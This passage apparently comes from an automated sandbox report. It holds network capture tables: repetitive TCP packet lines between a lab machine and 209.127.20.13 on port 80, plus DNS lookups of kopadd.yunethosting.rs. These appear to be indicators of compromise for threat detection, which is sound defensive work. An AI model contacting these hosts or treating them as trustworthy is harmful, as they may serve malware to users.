                Aug 26, 2022 00:13:43.199729919 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.199769974 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.199796915 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.199809074 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.199850082 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.199876070 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.308021069 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.308059931 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.308087111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.308111906 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.308137894 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.308160067 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.308163881 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.308209896 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.308218002 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.417226076 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.417278051 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.417315960 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.417351961 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.417390108 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.417427063 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.417433023 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.417462111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.417474985 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.417480946 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.417510033 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.525567055 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.525605917 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.525628090 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.525650978 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.525674105 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.525681019 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.525696039 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.525712967 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.525717974 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.525733948 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.525737047 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.525758028 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.525788069 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.634010077 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.634102106 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.634162903 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.634167910 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.634226084 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.634227991 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.634289980 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.634351969 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.634354115 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.634412050 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.634469032 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.634474993 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.634532928 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.634594917 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.742713928 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.742773056 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.742815971 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.742840052 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.742861986 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.742903948 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.742916107 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.742948055 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.742989063 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.743000984 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.743031025 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.743072033 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.743078947 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.743110895 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.743149996 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.743156910 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.852989912 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853018999 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853037119 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853061914 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853069067 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.853079081 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853096008 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.853097916 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853115082 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853123903 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.853132010 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853152037 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853163004 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.853168011 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853180885 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.853342056 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.961695910 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.961739063 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.961766958 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.961796045 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.961827040 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.961839914 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.961874008 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.962260008 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.962296963 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.962327003 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.962337971 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.962368011 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.962372065 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.962407112 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.962435961 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.962449074 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:43.962476015 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.962507010 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:43.962517977 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.074167013 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074253082 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074301004 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.074316025 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074368000 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.074376106 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074430943 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074486971 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.074486971 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074547052 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074594021 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.074605942 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074666023 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074717045 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.074727058 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074786901 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.074832916 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.074846029 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183478117 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183516979 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183545113 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183572054 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183598995 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183646917 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.183681965 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.183686018 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.183767080 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183795929 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183825016 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183839083 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.183876038 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183904886 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183917999 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.183932066 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.183981895 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.184005022 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.184034109 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.184075117 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.291873932 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.291914940 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.291939974 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.291959047 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.291977882 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.291999102 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292004108 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.292018890 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.292022943 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292038918 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.292047977 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292073011 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292097092 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292098999 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.292121887 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292133093 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.292146921 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292184114 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.292221069 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292248964 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292273998 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.292290926 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.401618958 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.401649952 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.401667118 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.401685953 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.401704073 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.401721001 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.401726007 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.401736021 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.401740074 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.401751995 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.401793003 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.401818037 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.401892900 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.401932955 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.402132988 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.402259111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.402306080 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.402334929 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.402386904 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.402427912 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.402455091 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.402517080 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.402558088 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.511570930 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511624098 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511651993 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511678934 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511703968 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511725903 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.511727095 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511745930 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.511750937 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511763096 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.511776924 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511802912 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511814117 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.511828899 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511854887 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511863947 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.511879921 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511915922 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.511969090 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.511995077 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.512034893 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.512089968 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.512115955 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.512156010 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.512213945 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620488882 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620544910 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620584965 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620621920 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620661020 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620666981 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.620698929 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.620699883 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620739937 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620743036 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.620779037 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620820045 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620821953 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.620856047 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620894909 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620902061 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.620933056 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620969057 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.620975018 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.621006012 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.621085882 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.621113062 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.621125937 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.621164083 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.621165991 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.729409933 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729470968 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729496956 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.729515076 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729554892 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.729557037 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729595900 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729634047 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.729635954 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729679108 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729722023 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729726076 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.729763985 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729801893 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.729803085 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729844093 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729878902 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.729882956 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729922056 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.729959011 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.729962111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.730001926 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.730036974 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.730041981 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.730083942 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.730119944 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.730123043 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838208914 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838242054 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838264942 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838289022 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838310003 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838331938 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838349104 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.838373899 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.838377953 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.838402033 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838537931 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838576078 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.838594913 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838665962 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838694096 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838701010 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.838742018 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838772058 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838787079 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.838816881 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838856936 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.838860989 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838960886 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.838989973 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.839013100 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.839015007 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.839054108 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.839170933 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.947709084 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.947762012 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.947793961 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.947827101 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.947848082 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.947855949 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.947875977 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.947886944 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.947887897 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.947916985 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.947940111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.947968960 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.947969913 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948005915 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.948051929 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948103905 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948141098 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.948276043 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948306084 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948337078 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948340893 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.948400021 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948432922 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948441029 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.948465109 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948494911 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948499918 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.948524952 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.948559999 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:44.948580027 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:44.954410076 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:45.057665110 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:45.057727098 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:45.057749987 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:45.057771921 CEST8049174209.127.20.13192.168.2.22
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Aug 26, 2022 00:13:08.543957949 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
                Aug 26, 2022 00:13:08.562979937 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
                Aug 26, 2022 00:13:21.325611115 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
                Aug 26, 2022 00:13:21.346823931 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
                Aug 26, 2022 00:13:21.353519917 CEST | 50134 | 53 | 192.168.2.22 | 8.8.8.8
                Aug 26, 2022 00:13:21.374419928 CEST | 53 | 50134 | 8.8.8.8 | 192.168.2.22
                Aug 26, 2022 00:13:28.494937897 CEST | 55275 | 53 | 192.168.2.22 | 8.8.8.8
                Aug 26, 2022 00:13:28.556293964 CEST | 53 | 55275 | 8.8.8.8 | 192.168.2.22
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Aug 26, 2022 00:13:08.543957949 CEST | 192.168.2.22 | 8.8.8.8 | 0x23a | Standard query (0) | kopadd.yunethosting.rs | A (IP address) | IN (0x0001)
                Aug 26, 2022 00:13:21.325611115 CEST | 192.168.2.22 | 8.8.8.8 | 0x40ae | Standard query (0) | google.com | A (IP address) | IN (0x0001)
                Aug 26, 2022 00:13:21.353519917 CEST | 192.168.2.22 | 8.8.8.8 | 0x220 | Standard query (0) | google.com | A (IP address) | IN (0x0001)
                Aug 26, 2022 00:13:28.494937897 CEST | 192.168.2.22 | 8.8.8.8 | 0x46e7 | Standard query (0) | kopadd.yunethosting.rs | A (IP address) | IN (0x0001)
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Aug 26, 2022 00:13:08.562979937 CEST | 8.8.8.8 | 192.168.2.22 | 0x23a | No error (0) | kopadd.yunethosting.rs | | 194.247.196.66 | A (IP address) | IN (0x0001)
                Aug 26, 2022 00:13:21.346823931 CEST | 8.8.8.8 | 192.168.2.22 | 0x40ae | No error (0) | google.com | | 142.250.184.78 | A (IP address) | IN (0x0001)
                Aug 26, 2022 00:13:21.374419928 CEST | 8.8.8.8 | 192.168.2.22 | 0x220 | No error (0) | google.com | | 142.250.184.78 | A (IP address) | IN (0x0001)
                Aug 26, 2022 00:13:28.556293964 CEST | 8.8.8.8 | 192.168.2.22 | 0x46e7 | No error (0) | kopadd.yunethosting.rs | | 194.247.196.66 | A (IP address) | IN (0x0001)
                • kopadd.yunethosting.rs
